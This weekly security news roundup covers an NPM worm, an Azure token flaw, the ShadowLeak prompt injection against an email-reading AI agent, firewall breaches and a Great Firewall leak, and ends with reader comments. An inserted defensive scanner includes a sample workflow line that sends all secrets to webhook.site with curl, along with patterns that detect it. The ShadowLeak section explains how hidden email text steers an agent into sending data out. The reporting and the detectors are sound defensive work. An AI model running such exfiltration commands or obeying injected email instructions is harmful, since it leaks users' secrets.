This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall

Hardly a week goes by that there isn’t a story to cover about malware getting published to a repository. Last week it was millions of downloads on NPM, but this week it’s something much more concerning. Malware published on NPM is now looking for NPM tokens, and propagating to other NPM packages when found. Yes, it’s a worm, jumping from one NPM package to another, via installs on developer machines.

It does other things too, like grabbing all the secrets it can find when installed on a machine. If the compromised machine has access to a GitHub account, a new repo is created named Shai-Hulud, borrowed from the name of the sandworms from Dune. The collected secrets and machine info get uploaded here, and a workflow also uploads any available GitHub secrets to the webhook.site domain.
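A defender can check a checkout and an account's repository list for the two indicators named above. This is an added example, not code from the article or from NPM/GitHub; the `toJSON(secrets)` heuristic, the function names and the sample workflow files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the article: exfiltration to webhook.site and a
# repository named Shai-Hulud. The toJSON(secrets) pattern is an added heuristic.
EXFIL_HOST = re.compile(r"https?://[\w.-]*webhook\.site\b", re.I)
SECRETS_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)", re.I)

def scan_workflows(checkout: Path) -> list:
    """Return (file name, line number, reason) for suspicious workflow lines."""
    findings = []
    wf_dir = checkout / ".github" / "workflows"
    for path in sorted(wf_dir.glob("*.y*ml")) if wf_dir.is_dir() else []:
        for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if EXFIL_HOST.search(line):
                findings.append((path.name, n, "posts to webhook.site"))
            if SECRETS_DUMP.search(line):
                findings.append((path.name, n, "serializes every secret"))
    return findings

def suspicious_repos(repo_names) -> list:
    """Flag repositories whose name matches the worm's drop repo."""
    return [r for r in repo_names if r.split("/")[-1].lower() == "shai-hulud"]

def demo() -> list:
    """Scan a constructed checkout holding one benign and one flagged workflow."""
    with tempfile.TemporaryDirectory() as tmp:
        wf = Path(tmp) / ".github" / "workflows"
        wf.mkdir(parents=True)
        (wf / "ci.yml").write_text("on: push\njobs:\n  test:\n    steps:\n      - run: npm test\n")
        (wf / "extra.yml").write_text(
            "on: push\njobs:\n  x:\n    steps:\n"
            "      - run: echo '${{ toJSON(secrets) }}' | curl -d @- https://webhook.site/EXAMPLE\n")
        return scan_workflows(Path(tmp))

if __name__ == "__main__":
    print(demo())
    print(suspicious_repos(["acme/api", "dev1/Shai-Hulud"]))
```

A hit on either check is a reason to rotate the NPM and GitHub tokens reachable from that machine, not proof of compromise on its own.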

How many packages are we talking about? At least 187, with some reports of over 500 packages compromised. The immediate attack has been contained, as NPM has worked to remove the compromised packages, and apparently has added filtering code that blocks the upload of compromised packages.

So far there hasn’t been an official statement on the worm from NPM or its parent companies, GitHub or Microsoft. Malicious packages being uploaded to NPM is definitely nothing new. But this is the first time we’ve seen a worm that specializes in NPM packages. It’s not a good step for the trustworthiness of NPM or the direct package distribution model.

Token Impersonation in Azure

There’s an interesting write-up from [Dirk-jan Mollema] detailing his findings regarding Azure impersonation tokens and how to abuse them. This is about the Entra ID service, the identity and access management component of the Azure cloud. Azure has a function that allows a service like Exchange to generate an actor token, allowing the service to interact with the rest of Azure on behalf of a user.

These tokens are just signed JSON Web Tokens (JWTs). For a service to actually use one of these tokens, it’s embedded inside yet another, unsigned JWT. This outer token container has multiple fields indicating the tenant that signed the inner token and the tenant the request is intended for. You may already wonder, what happens if we could get our hands on one of these double-wrapped tokens, and manipulate the target tenant field?

If an attacker can discover the tenant ID and a valid netId for a user in the victim tenant, one of these impersonation tokens could be generated from the attacker-owned tenant, and then manipulated to point to the victim tenant. From there, the attacker could perform any action as that user. It was an extremely significant flaw, and Microsoft pushed an immediate patch within days. The CVE gets a perfect 10 base score on the CVSS 3.1 scale.
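The general lesson for anyone validating a signed token carried inside an unsigned wrapper is that wrapper fields must be bound to signed claims. The sketch below is an added example, not Microsoft's code or fix; the field names (`actor_token`, `target_tenant`, `tenant`, `user`), the demo key and the use of HS256 in place of an asymmetric signature are all assumptions.

```python
import base64, hashlib, hmac, json

# Constructed demo key. HS256 is swapped in to stay stdlib-only; it stands in
# for the issuer's real asymmetric signature. All field names are hypothetical.
ISSUER_KEY = b"constructed-demo-key"

def b64u(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64u_dec(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_jwt(header, claims, key=None):
    """Build a compact JWT; key=None yields an unsigned token (empty signature)."""
    body = b64u(json.dumps(header).encode()) + "." + b64u(json.dumps(claims).encode())
    sig = b64u(hmac.new(key, body.encode(), hashlib.sha256).digest()) if key else ""
    return body + "." + sig

def signed_claims(token, key):
    """Return the claims only if the HS256 signature verifies."""
    head, body, sig = token.split(".")
    if json.loads(b64u_dec(head)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64u_dec(sig)):
        raise ValueError("bad inner signature")
    return json.loads(b64u_dec(body))

def accept_wrapped(outer, my_tenant, key=ISSUER_KEY):
    """Validate an unsigned wrapper by binding its tenant field to the signed token."""
    wrapper = json.loads(b64u_dec(outer.split(".")[1]))  # unauthenticated input
    inner = signed_claims(wrapper["actor_token"], key)
    # Nothing in the wrapper is signed, so its tenant field is only a hint:
    # it must agree with the signed claim, and that claim must be ours.
    if wrapper["target_tenant"] != inner["tenant"]:
        raise PermissionError("wrapper tenant differs from signed tenant")
    if inner["tenant"] != my_tenant:
        raise PermissionError("token was not issued for this tenant")
    return {"tenant": inner["tenant"], "user": wrapper["user"]}

def demo_wrapper(target_tenant):
    """Constructed sample: inner token signed for tenant-a inside an unsigned wrapper."""
    inner = make_jwt({"alg": "HS256"}, {"tenant": "tenant-a"}, ISSUER_KEY)
    return make_jwt({"alg": "none"}, {"actor_token": inner,
                    "target_tenant": target_tenant, "user": "alice"})
```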

ShadowLeak and Prompt Injection, the Attack That Won’t Go Away

There’s yet another example of weaponizing prompt injections against LLMs, in the form of ShadowLeak. And again, it’s the case where agentic AI can fall to social engineering.

The setup is that the AI is handling incoming emails, and the prompt is hidden inside an incoming email, perhaps as white text on a white background. The real challenge here isn’t sneaking the prompt in, but how to exfiltrate data afterwards. OpenAI’s Deep Research agent includes browser.open, to allow the AI to interact with the Internet. And of course, this gives the agent the ability to send data to a remote endpoint.

Firewall Warnings

SonicWall has announced that their MySonicWall systems were breached, and customers have been warned that their firewall configuration backups may have been compromised. These backups appear to include passwords.

Watchguard Firebox firewalls have an out-of-bounds write that can allow Remote Code Execution (RCE) on firewalls running VPNs with IKEv2. A fix is available for the units that are still actively supported, and it’s possible to mitigate against the flaw.

Inside The Great Wall

There was a huge, 600 GB leak last week, of source code and information about the Great Firewall of China. If you click through, the 600 GB leak is available to download, but it’s not something to download and interact with lightly. Put simply, it’s a lot of data produced by state-sponsored actors, dealing with rather sensitive capabilities.

Among the non-source files, there are some interesting details, such as how the Chinese firewall has been exported to multiple other countries. The source code itself is still being analyzed, and so far it’s an interesting look into the cat and mouse game that has been long played between the Chinese government and VPN technologies. This leak will likely take quite some time to fully analyze, but promises to provide a significant look into the internals of the Great Firewall.

Bits and Bytes

LG TVs running WebOS had a fun issue, where plugging in a USB drive exposed the files on a web endpoint. The filename to download is specified via a parameter to that url, and that parameter doesn’t do path traversal filtering. This gives arbitrary read access to the whole device filesystem.

Google has uncovered and then squashed the SlopAds advertising fraud campaign. This campaign was a collection of apps that presented themselves as hastily made, “AI slop” apps. But when installed, these apps clicked as fast as they could on ads that paid out for the attackers. This represents 224 malicious applications removed, and was resulting in 2.3 billion ad hits per day.

6 thoughts on “This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall”

  1. This comments section is probably gonna get a laugh from this…

    When I heard about the data leak, I went to the server where it was stored. I was just mildly curious, so I downloaded one of the docx files and opened it.

    Just then, I realized. Probably should have used a VM.

    Wiping my computer and reinstalling Windows 11 right now. I ran the file through virustotal and even used 7-zip to inspect the xml itself, didn’t reveal anything too suspicious. Better safe than sorry though.

    Yeah it was stupid. Yeah my curiosity got the better of me.
    Don’t do what I did guys.

    1. From the linked site if you scroll down a bit:

      Due to the highly sensitive nature of these leaked materials, we strongly advise anyone who chooses to download and analyze them to take proper operational security precautions. It may be possible that these files may contain potentially risky content and accessing them in an insecure environment could expose you to surveillance or malware.

      Please consider analyzing these files only in an isolated (virtual) machine without internet access.

  2. “If you click through, the 600 GB leak is available to download, but it’s not something to download and interact with lightly.” Ted Bundy’s laundry might be pretty creepy but it’s not going to make the house which contains my washing machine inedible. “Your autopsy report is trying to kill you!”

    Of course it would be a shame if a clever fellow had embedded child porn in it. You checked for that before providing the link, right? Akismet?
